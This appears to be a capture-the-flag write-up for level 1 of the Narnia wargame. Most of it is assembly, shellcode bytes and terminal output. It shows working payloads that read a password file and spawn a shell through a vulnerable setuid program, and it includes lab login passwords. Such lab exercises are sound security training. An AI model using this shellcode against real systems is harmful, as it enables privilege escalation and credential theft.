# Narnia wargame: Level 1


# cat mycat.asm
BITS 32
xor eax,eax
cdq
mov byte al,11
push edx
push long 0x7461632f ; tac/
push long 0x6e69622f ; nib/
mov ebx,esp
push edx
push long 0x3261696e ; 2ain
push long 0x72616e2f ; ran/
push long 0x73736170 ; ssap
push long 0x5f61696e ; _ain
push long 0x72616e2f ; nar/
push long 0x6374652f ; cte/
mov ecx,esp
push edx
mov edx,esp
push ecx
push ebx
mov ecx,esp
int 0x80
# nasm -f elf mycat.asm && ld -o mycat mycat.o
# od2sc mycat
"\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x6e\x69\x61\x32\x68\x2f\x6e\x61\x72\x68\x70\x61\x73\x73\x68\x6e\x69\x61\x5f\x68\x2f\x6e\x61\x72\x68\x2f\x65\x74\x63\x89\xe1\x52\x89\xe2\x51\x53\x89\xe1\xcd\x80"

# ssh narnia1@narnia.labs.overthewire.org
narnia1@narnia.labs.overthewire.org's password:65666569646965646165

narnia1@melissa$ file /narnia/narnia1
/narnia/narnia1: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
narnia1@melissa$ cat /narnia/narnia1.c
#include <stdio.h>

int main(){
        int (*ret)();

        if(getenv("EGG")==NULL){
                printf("Give me something to execute at the env-variable EGG\n");
                exit(1);
        }

        printf("Trying to execute EGG!\n");
        ret = getenv("EGG");
        ret();

        return 0;
}
narnia1@melissa$ export  EGG=`perl -e 'print "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x6e\x69\x61\x32\x68\x2f\x6e\x61\x72\x68\x70\x61\x73\x73\x68\x6e\x69\x61\x5f\x68\x2f\x6e\x61\x72\x68\x2f\x65\x74\x63\x89\xe1\x52\x89\xe2\x51\x53\x89\xe1\xcd\x80"'`
narnia1@melissa$ /narnia/narnia1
Trying to execute EGG!
6e616972696570656375
narnia1@melissa$ export  EGG=`perl -e 'print "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"'`
narnia1@melissa$ /narnia/narnia1
Trying to execute EGG!
$ /usr/bin/whoami
narnia2
$ /bin/cat /etc/narnia_pass/narnia2
6e616972696570656375

No comments: